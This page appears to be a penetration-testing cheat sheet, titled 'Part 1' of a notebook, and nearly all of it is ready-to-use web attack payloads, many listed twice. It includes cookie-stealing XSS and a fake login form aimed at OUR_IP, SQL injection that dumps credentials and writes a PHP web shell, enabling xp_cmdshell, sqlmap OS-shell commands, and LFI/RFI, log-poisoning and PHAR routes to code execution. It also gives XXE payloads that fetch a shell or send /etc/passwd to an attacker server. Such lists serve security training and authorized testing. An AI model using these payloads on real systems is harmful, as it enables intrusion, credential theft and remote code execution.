Part 1

Tools like smuggler.py (Python) can be used to identify potential HTTP request smuggling vulnerabilities.

Code Description

Code	Description
`<script>alert(window.origin)</script>`	Basic XSS Payload
`<plaintext>`	Basic XSS Payload
`<script>print()</script>`	Basic XSS Payload
`<img src="" onerror=alert(window.origin)>`	HTML-based XSS Payload
`<script>document.body.style.background = "#141d2b"</script>`	Change Background Color
`<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>`	Change Background Image
`<script>document.title = 'HackTheBox Academy'</script>`	Change Website Title
`<script>document.getElementsByTagName('body')[0].innerHTML = 'text'</script>`	Overwrite website's main body
`<script>document.getElementById('urlform').remove();</script>`	Remove certain HTML element
`<script src="http://OUR_IP/script.js"></script>`	Load remote script
`<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>`	Send Cookie details to us
`<iframe src=file:///C:/windows/win.ini>`	Load remote ini file via iframe tag
`document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');`	Login Form Injection
curl -isk "https://site.com"	Test for status of Content Security Policy

<script>alert(window.origin)</script>

Basic XSS Payload

<plaintext>

Basic XSS Payload

<script>print()</script>

Basic XSS Payload

<img src="" onerror=alert(window.origin)>

HTML-based XSS Payload

<script>document.body.style.background = "#141d2b"</script>

Change Background Color

<script>document.body.background = "https://www.hackthebox.eu/images/logo-htb.svg"</script>

Change Background Image

<script>document.title = 'HackTheBox Academy'</script>

Change Website Title

<script>document.getElementsByTagName('body')[0].innerHTML = 'text'</script>

Overwrite website's main body

<script>document.getElementById('urlform').remove();</script>

Remove certain HTML element

<script src="http://OUR_IP/script.js"></script>

Load remote script

<script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script>

Send Cookie details to us

<iframe src=file:///C:/windows/win.ini>

Load remote ini file via iframe tag

document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');

curl -isk "https://site.com"

Test for status of Content Security Policy

Serve XSS 𝙥𝙖𝙮𝙡𝙤𝙖𝙙 from a XML file

<?xml version="1.0" encoding="UTF-8"?>
<html xmlns:html="http://w3.org/1999/xhtml">
<html:script>prompt(document.domain);</html:script>
</html>

Sample XSS Polyglot

'"onclick=(co\u006efirm)?.`0`><sVg/i="${{7*7}}"oNload=" 0>(pro\u006dpt)`1`"></svG/</sTyle/</scripT/</textArea/</iFrame/</noScript/</seLect/--><h1><iMg/srC/onerror=alert`2`>%22%3E%3CSvg/onload=confirm`3`//<Script/src=//ChiragXSS.xSs.ht></scripT>

Step 1: Test vulnerable form for the remove function by running script in console (Dev-Tools)

document.getElementById('urlform').remove();

Step 2: Inject form into webpage with XSS payload by executing the below script into console (Dev-tools)

document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');

After successfully authenticating to a SQL Server It is worth a shot to verify if xp_cmdshell has been previously activated with:

EXEC xp_cmdshell 'net user';

If xp_cmdshell has not been activated, run the below commands to activate and utilize Windows XP cmd commands within SQL:

# The command below enables sp_configure 

EXEC sp_configure 'show advanced options', 1;

RECONFIGURE; sp_configure;

message EXEC sp_configure 'xp_cmdshell', 1;

RECONFIGURE;

Basic SQL Testing

Command Description

Command	Description
`SELECT`	Select data from database
`FROM`	Specify table to retrieve data
`WHERE`	Filter query to match a given condition
`INSERT`	Add single row to table
`CREATE`	Used to Create a TABLE, DATABASE, INDEX or VIEW
`ALTER TABLE`	Add/Remove columns from a table
`UPDATE`	Update table data
`DELETE`	Delete rows from table
`AS`	Used to rename column/table with alias
`JOIN`	Combine rows from 2 or more tables
`AND`	Combine query conditions (must meet all conditions)
`OR`	Combine query conditions. (only one must be met)
`LIMIT`	Limit the amount of rows returned
`IN`	Specify multiple values (only used with WHERE)
`CASE`	Return value on a specified condition
`IS NULL`	Return only rows with a NULL value
`LIKE`	Search for pattern in a column
`COMMIT`	Write a transaction to the database
`ROLLBACK`	Undo a transaction
`DROP`	Delete TABLE, DATABASE or INDEX
`GROUP BY`	Group data into logical sets
`ORDER BY`	Set order of results
`HAVING`	Functions like WHERE but filters groups
`COUNT`	Count rows
`SUM`	Return a sum of a column
`AVG`	Return average of a column
`MIN`	Return min value of a column
`MAX`	Return max value of a column

SELECT

Select data from database

FROM

Specify table to retrieve data

WHERE

Filter query to match a given condition

INSERT

Add single row to table

CREATE

Used to Create a TABLE, DATABASE, INDEX or VIEW

ALTER TABLE

Add/Remove columns from a table

UPDATE

Update table data

DELETE

Delete rows from table

AS

Used to rename column/table with alias

JOIN

Combine rows from 2 or more tables

AND

Combine query conditions (must meet all conditions)

OR

Combine query conditions. (only one must be met)

LIMIT

Limit the amount of rows returned

IN

Specify multiple values (only used with WHERE)

CASE

Return value on a specified condition

IS NULL

Return only rows with a NULL value

LIKE

Search for pattern in a column

COMMIT

Write a transaction to the database

ROLLBACK

Undo a transaction

DROP

Delete TABLE, DATABASE or INDEX

GROUP BY

Group data into logical sets

ORDER BY

Set order of results

HAVING

Functions like WHERE but filters groups

COUNT

Count rows

SUM

Return a sum of a column

AVG

Return average of a column

MIN

Return min value of a column

MAX

Return max value of a column

MySQL Basics

Command Description

Command	Description
General
`mysql -u root -h docker.hackthebox.eu -P 3306 -p`	login to mysql database
`SHOW DATABASES`	List available databases
`USE users`	Switch to database
Tables
`CREATE TABLE logins (id INT, ...)`	Add a new table
`SHOW TABLES`	List available tables in current database
`DESCRIBE logins`	Show table properties and columns
`INSERT INTO table_name VALUES (value_1,..)`	Add values to table
`INSERT INTO table_name(column2, ...) VALUES (column2_value, ..)`	Add values to specific columns in a table
`UPDATE table_name SET column1=newvalue1, ... WHERE <condition>`	Update table values
Columns
`SELECT * FROM table_name`	Show all columns in a table
`SELECT column1, column2 FROM table_name`	Show specific columns in a table
`DROP TABLE logins`	Delete a table
`ALTER TABLE logins ADD newColumn INT`	Add new column
`ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn`	Rename column
`ALTER TABLE logins MODIFY oldColumn DATE`	Change column datatype
`ALTER TABLE logins DROP oldColumn`	Delete column
Output
`SELECT * FROM logins ORDER BY column_1`	Sort by column
`SELECT * FROM logins ORDER BY column_1 DESC`	Sort by column in descending order
`SELECT * FROM logins ORDER BY column_1 DESC, id ASC`	Sort by two-columns
`SELECT * FROM logins LIMIT 2`	Only show first two results
`SELECT * FROM logins LIMIT 1, 2`	Only show first two results starting from index 2
`SELECT * FROM table_name WHERE <condition>`	List results that meet a condition
`SELECT * FROM logins WHERE username LIKE 'admin%'`	List results where the name is similar to a given string

General

mysql -u root -h docker.hackthebox.eu -P 3306 -p

SHOW DATABASES

List available databases

USE users

Switch to database

Tables

CREATE TABLE logins (id INT, ...)

Add a new table

SHOW TABLES

List available tables in current database

DESCRIBE logins

Show table properties and columns

INSERT INTO table_name VALUES (value_1,..)

Add values to table

INSERT INTO table_name(column2, ...) VALUES (column2_value, ..)

Add values to specific columns in a table

UPDATE table_name SET column1=newvalue1, ... WHERE <condition>

Update table values

Columns

SELECT * FROM table_name

Show all columns in a table

SELECT column1, column2 FROM table_name

Show specific columns in a table

DROP TABLE logins

Delete a table

ALTER TABLE logins ADD newColumn INT

Add new column

ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn

Rename column

ALTER TABLE logins MODIFY oldColumn DATE

Change column datatype

ALTER TABLE logins DROP oldColumn

Delete column

Output

SELECT * FROM logins ORDER BY column_1

Sort by column

SELECT * FROM logins ORDER BY column_1 DESC

Sort by column in descending order

SELECT * FROM logins ORDER BY column_1 DESC, id ASC

Sort by two-columns

SELECT * FROM logins LIMIT 2

Only show first two results

SELECT * FROM logins LIMIT 1, 2

Only show first two results starting from index 2

SELECT * FROM table_name WHERE <condition>

List results that meet a condition

SELECT * FROM logins WHERE username LIKE 'admin%'

List results where the name is similar to a given string

MySQL Operator Precedence

Division (/), Multiplication (*), and Modulus (%)
Addition (+) and Subtraction (-)
Comparison (=, >, <, <=, >=, !=, LIKE)
NOT (!)
AND (&&)
OR (||)

SQL Injection

Payload Description

Payload	Description
Auth Bypass
`admin' or '1'='1`	Basic Auth Bypass
`admin')-- -`	Basic Auth Bypass With comments
Auth Bypass Payloads
Union Injection
`' order by 1-- -`	Detect number of columns using `order by`
`cn' UNION select 1,2,3-- -`	Detect number of columns using Union injection
`cn' UNION select 1,@@version,3,4-- -`	Basic Union injection
`UNION select username, 2, 3, 4 from passwords-- -`	Union injection for 4 columns
DB Enumeration
`SELECT @@version`	Fingerprint MySQL with query output
`SELECT SLEEP(5)`	Fingerprint MySQL with no output
`cn' UNION select 1,database(),2,3-- -`	Current database name
`cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -`	List all databases
`cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -`	List all tables in a specific database
`cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -`	List all columns in a specific table
`cn' UNION select 1, username, password, 4 from dev.credentials-- -`	Dump data from a table in another database
Privileges
`cn' UNION SELECT 1, user(), 3, 4-- -`	Find current user
`cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -`	Find if user has admin privileges
`cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE user="root"-- -`	Find if all user privileges
`cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -`	Find which directories can be accessed through MySQL
File Injection
`cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -`	Read local file
`select 'file written successfully!' into outfile '/var/www/html/proof.txt'`	Write a string to a local file
`cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -`	Write a web shell into the base web directory

Auth Bypass

admin' or '1'='1

Basic Auth Bypass

admin')-- -

Basic Auth Bypass With comments

Auth Bypass Payloads

Union Injection

' order by 1-- -

Detect number of columns using order by

cn' UNION select 1,2,3-- -

Detect number of columns using Union injection

cn' UNION select 1,@@version,3,4-- -

Basic Union injection

UNION select username, 2, 3, 4 from passwords-- -

Union injection for 4 columns

DB Enumeration

SELECT @@version

Fingerprint MySQL with query output

SELECT SLEEP(5)

Fingerprint MySQL with no output

cn' UNION select 1,database(),2,3-- -

Current database name

cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -

List all databases

cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -

List all tables in a specific database

cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -

List all columns in a specific table

cn' UNION select 1, username, password, 4 from dev.credentials-- -

Dump data from a table in another database

Privileges

cn' UNION SELECT 1, user(), 3, 4-- -

Find current user

cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -

Find if user has admin privileges

cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE user="root"-- -

Find if all user privileges

cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -

Find which directories can be accessed through MySQL

File Injection

cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -

Read local file

select 'file written successfully!' into outfile '/var/www/html/proof.txt'

Write a string to a local file

cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -

Write a web shell into the base web directory

NoSQL Basics

Command Description

Command	Description
`show dbs;`	List all the databases present
`use user_creds;`	Switch to database named "user_creds"
`show collections;`	List out the collections in a database
`db.flag.find().pretty()`	Dump the contents of the documents present in the flag collection
`http://url?login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto`	Basic NoSQLi Login

show dbs;

List all the databases present

use user_creds;

Switch to database named "user_creds"

show collections;

List out the collections in a database

db.flag.find().pretty()

Dump the contents of the documents present in the flag collection

http://url?login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto

Basic NoSQLi Login

SQLmap

Command Description

Command	Description
`sqlmap -h`	View the basic help menu
`sqlmap -hh`	View the advanced help menu
`sqlmap -u "http://www.example.com/vuln.php?id=1" --batch`	Run `SQLMap` without asking for user input
`sqlmap 'http://www.example.com/' --data 'uid=1&name=test'`	`SQLMap` with POST request
`sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'`	POST request specifying an injection point with an asterisk
`sqlmap -r req.txt`	Passing an HTTP request file to `SQLMap`
`sqlmap ... --cookie='PHPSESSID=abcdefghijklmnop'`	Specifying a cookie header
`sqlmap -u www.target.com --data='id=1' --method PUT`	Specifying a PUT request
`sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt`	Store traffic to an output file
`sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch`	Specify verbosity level
`sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"`	Specifying a prefix or suffix
`sqlmap -u www.example.com/?id=1 -v 3 --level=5`	Specifying the level and risk
`sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba`	Basic DB enumeration
`sqlmap -u "http://www.example.com/?id=1" --tables -D testdb`	Table enumeration
`sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname`	Table/row enumeration
`sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"`	Conditional enumeration
`sqlmap -u "http://www.example.com/?id=1" --schema`	Database schema enumeration
`sqlmap -u "http://www.example.com/?id=1" --search -T user`	Searching for data
`sqlmap -u "http://www.example.com/?id=1" --passwords --batch`	Password enumeration and cracking
`sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"`	Anti-CSRF token bypass
`sqlmap --list-tampers`	List all tamper scripts
`sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba`	Check for DBA privileges
`sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"`	Reading a local file
`sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"`	Writing a file
`sqlmap -u "http://www.example.com/?id=1" --os-shell`	Spawning an OS shell

sqlmap -h

View the basic help menu

sqlmap -hh

View the advanced help menu

sqlmap -u "http://www.example.com/vuln.php?id=1" --batch

Run SQLMap without asking for user input

sqlmap 'http://www.example.com/' --data 'uid=1&name=test'

SQLMap with POST request

sqlmap 'http://www.example.com/' --data 'uid=1*&name=test'

POST request specifying an injection point with an asterisk

sqlmap -r req.txt

Passing an HTTP request file to SQLMap

sqlmap ... --cookie='PHPSESSID=abcdefghijklmnop'

Specifying a cookie header

sqlmap -u www.target.com --data='id=1' --method PUT

Specifying a PUT request

sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt

Store traffic to an output file

sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch

Specify verbosity level

sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"

Specifying a prefix or suffix

sqlmap -u www.example.com/?id=1 -v 3 --level=5

Specifying the level and risk

sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba

Basic DB enumeration

sqlmap -u "http://www.example.com/?id=1" --tables -D testdb

Table enumeration

sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname

Table/row enumeration

sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'"

Conditional enumeration

sqlmap -u "http://www.example.com/?id=1" --schema

Database schema enumeration

sqlmap -u "http://www.example.com/?id=1" --search -T user

Searching for data

sqlmap -u "http://www.example.com/?id=1" --passwords --batch

Password enumeration and cracking

sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"

Anti-CSRF token bypass

sqlmap --list-tampers

List all tamper scripts

sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba

Check for DBA privileges

sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"

Reading a local file

sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"

Writing a file

sqlmap -u "http://www.example.com/?id=1" --os-shell

Spawning an OS shell

WAF BYPASSES

SELECT-1e1FROM`test`
SELECT~1.FROM`test`
SELECT\NFROM`test`
SELECT@^1.FROM`test`
SELECT-id-1.FROM`test`

Passwords

uNiOn aLl SeleCt 1,2,3,4,conCat(username,0x3a,password),6 FroM users
uNiOn aLl SeleCt 1,2,3,4,conCat(username,0x3a,password,0x3a,flag),6 FroM users

LFI workaround PoC

LFI via this path does not work at first

/fileRead.jsp?fileName=/etc/passwd (406)

But after replacing character with ? you may receive a successful response (200)

/fileRead.jsp?fileName=/?tc/?asswd (200)

fileRead.jsp?fileName=/??c/??sswd (200)

Fuzzing Parameters

# Fuff 
ffuf -w $SECLISTS/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287

LFI Wordlists

https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI

https://raw.githubusercontent.com/danielmiessler/SecLists/master/Fuzzing/LFI/LFI-Jhaddix.txt

https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt

https://swisskyrepo.github.io/PayloadsAllTheThingsWeb/File%20Inclusion/#basic-lfi

Local File Inclusion (LFI)

# Basic LFI
/etc/passwd

# Path Traversal
../../../../../../etc/passwd

Basic Bypasses

# When / is filtered
....//....//....//....//etc/passwd

# Other Techniques
 ....////

# Path Truncation
echo -n "non_existing_directory/../../../etc/passwd/" && for i in {1..2048}; do echo -n "./"; done

# Null Bytes
../../../../../../etc/passwd%00

PHP Filters

php://filter/read=convert.base64-encode/resource=config

PHP Wrappers

Data Wrapper

The data wrapper is only available to use if the (allow_url_include) setting is enabled in the PHP configurations.

# Check PHP Config
/etc/php/X.Y/apache2/php.ini

# Check allow_url_Include Enabled
php.ini | grep allow_url_include

# Remote Code Execution
echo '<?php system($_GET["cmd"]); ?>' | base64

data://text/plain;base64,<base64>&cmd=id

Input Wrapper

Must accept POST requests for this attack to work. The input wrapper also depends on the allow_url_include setting

# Gaining Remote Code Execution
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id" | grep uid

Expect Wrapper

# Check PHP Config
/etc/php/X.Y/apache2/php.ini

# Check allow_url_Include Enabled
php.ini | grep expect

# Gaining Remote Code Execution
curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"

Remote File Inclusion (RFI)

# Verify RFI
cat php.ini | grep allow_url_include

# RFI File
echo '<?php system($_GET["cmd"]); ?>' > shell.php

# Host File
sudo python3 -m http.server 8000

# Execute Command
/shell.php&cmd=id

LFI & File Uploads

Image Upload

# Create RCE File
echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif

# Execute Command
./profile_images/shell.gif&cmd=id

ZIP Upload

# Create Malicous ZIP File
echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php

# Execute Command
zip://./profile_images/shell.jpg%23shell.php&cmd=id

PHAR Upload

# Create Malicous PHP File
## Shell.php
<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');

$phar->stopBuffering();

# Compile PHP -> Phar
php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg

# Execute Command
phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id

Log Poisoning

PHP Session Poisoning

# Check PHP Session Cookie
/var/lib/php/sessions/sess_<your_session_id>

# Poison Log
/var/lib/php/sessions/%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E

# RCE
/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id

Server Log Poisoning

# Default Location Apache
/var/log/apache2/access.log
/var/log/apache2/error.log

C:\xampp\apache\logs\access.log
C:\xampp\apache\logs\error.log

# Default Location Nginx
/var/log/nginx/access.log
/var/log/nginx/error.log

C:\nginx\log\access.log
C:\nginx\log\error.log

# Inject Into User-Agent Header
User-Agent: <?php system($_GET["cmd"]); ?>

# Code Execution
/var/log/apache2.log&cmd=id

File Inclusion Parameters

?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}

Find and replace IDs in urls, headers and body : /users/01=> /users/02
Try Parameter Pollution: users=01 => users=01&users=02
Special Characters: /users/01* or /users/* => Disclosure of every single user
Try Older versions of API endpoints: /api/v3/users/01 => /api/v1/users/02
Add extension: /users/01 => /users/02.json
Change Request Methods: POST /users/01 => GET, PUT, PATCH, DELETE, OPTIONS,etc
Check if Referer or other Headers are used to validate IDs:
- GET /users/02 Referer: example.com/users/01 => 403 Forbidden
- GET /users/02
  Referer: example.com/users/02 => 200 OK
Encrypted IDs: If application is using encrypted IDs, try to decrypt using hashing/cracking tool
Send wildcard {""user_id"":""*""}
Send ID twice URL?id=&id=
JSON wrap {“id”:111} --> {“id”:{“id”:111}}
Wrap ID with an array {“id”:111} --> {“id”:[111]}
Swap GUID with Numeric ID or email: /users/XXXXXXXX-XXXX-XXXX-XXXXXXXXXXXX => /users/02 or /users/a@b.com
Try GUIDs such as: 00000000-0000-0000-000000000000 and 11111111-1111-1111-111111111111
GUID Enumeration: Try to disclose GUIDs using Google Dorks, Github, Wayback, Burp history
If none of the GUID Enumeration methods work then try: SignUp, Reset Password, and other endpoints and analyze the responses. An endpoint may disclose user's GUID within the application.
When a server responds with a 401/403, the action may still be performed. Ensure to verify the function within the application.
Blind IDORs: Look for endpoints/features that may disclose information
Chain IDOR with XSS for Account Takeovers

Send Post request with path to xml file for exploitation

curl -d@/home/researcher/Desktop/payloads/poc.xml http://vulnerablesite.com/home/vulnerable.php

OR Use a script to send payload: curl.sh

#!/bin/bash
curl -d@/home/researcher/Desktop/payloads/poc.xml http://vulnerablesite.com/home/vulnerable.php

ID.xml

<!--ID command example-->
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>

<entry>
    <subject>&xxe;</subject>
    <category>Clothing</category>
    <text>New Shoes</text>
</entry>

Read Robots.txt (Base 64)

<!--Base64 response example-->
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/respource=http://vulnerable site/" >]>

<entry>
    <subject>&xxe;</subject>
    <category>Clothing</category>
    <text>New Shoes</text>
</entry>

Local File Disclosure

<!DOCTYPE email [
  <!ENTITY read SYSTEM "file:///etc/passwd">
]>



<!DOCTYPE email [
  <!ENTITY read SYSTEM "php://filter/convert.base64-encode/resource=index.php">
]>

RCE

# Create RCE Shell
echo '<?php system($_REQUEST["cmd"]);?>' > shell.php

# XXE Injection
<?xml version="1.0"?>
<!DOCTYPE email [
  <!ENTITY company SYSTEM "expect://curl$IFS-O$IFS'OUR_IP/shell.php'">
]>
<root>
<name></name>
<tel></tel>
<email>&company;</email>
<message></message>
</root>

Advanced File Disclosure

Exfiltration with CDATA

# Create DTD File
echo '<!ENTITY joined "%begin;%file;%end;">' > xxe.dtd

# Upload XXE
<!DOCTYPE email [
  <!ENTITY % begin "<![CDATA[">
  <!ENTITY % file SYSTEM "file:///var/www/html/submitDetails.php"> 
  <!ENTITY % end "]]>"> 
  <!ENTITY % xxe SYSTEM "http://OUR_IP:8000/xxe.dtd"> 
  %xxe;
]>
...
<email>&joined;</email>

Error Based XXE

# DTD File
<!ENTITY % file SYSTEM "file:///etc/hosts">
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>">

# Upload XXE
<!DOCTYPE email [ 
  <!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
  %remote;
  %error;
]>

Blind Data Exfiltration

Out of Band Data Exfiltration

# DTD File
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>">

# PHP Server Setup
?php
if(isset($_GET['content'])){
    error_log("\n\n" . base64_decode($_GET['content']));
}
?>

# Run PHP Server
php -S 0.0.0.0:8000

# XXE 
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [ 
  <!ENTITY % remote SYSTEM "http://OUR_IP:8000/xxe.dtd">
  %remote;
  %oob;
]>
<root>&content;</root>

PreviousTargeted Test Cases NextPart 2

Last updated 2 months ago

CyberSpace Notebook

Part 1

Serve XSS 𝙥𝙖𝙮𝙡𝙤𝙖𝙙 from a XML file

Sample XSS Polyglot

Basic SQL Testing

MySQL Basics

MySQL Operator Precedence

SQL Injection

NoSQL Basics

SQLmap

LFI workaround PoC

Fuzzing Parameters

LFI Wordlists

Local File Inclusion (LFI)

Basic Bypasses

PHP Filters

PHP Wrappers

Data Wrapper

Input Wrapper

Expect Wrapper

Remote File Inclusion (RFI)

LFI & File Uploads

Image Upload

ZIP Upload

PHAR Upload

Log Poisoning

PHP Session Poisoning

Server Log Poisoning

File Inclusion Parameters

Local File Disclosure

RCE

Advanced File Disclosure

Exfiltration with CDATA

Error Based XXE

Blind Data Exfiltration

Out of Band Data Exfiltration

AWS

Azure

Serve XSS 𝙥𝙖𝙮𝙡𝙤𝙖𝙙 from a XML file

Sample XSS Polyglot

How to perform basic Login Form Injection via Reflected XSS

Basic SQL Testing

MySQL Basics

MySQL Operator Precedence

SQL Injection

NoSQL Basics

SQLmap

LFI workaround PoC

Fuzzing Parameters

LFI Wordlists

Local File Inclusion (LFI)

Basic Bypasses

PHP Filters

PHP Wrappers

Data Wrapper

Input Wrapper

Expect Wrapper

Remote File Inclusion (RFI)

LFI & File Uploads

Image Upload

ZIP Upload

PHAR Upload

Log Poisoning

PHP Session Poisoning

Server Log Poisoning

File Inclusion Parameters

Local File Disclosure

RCE

Advanced File Disclosure

Exfiltration with CDATA

Error Based XXE

Blind Data Exfiltration

Out of Band Data Exfiltration

AWS

Azure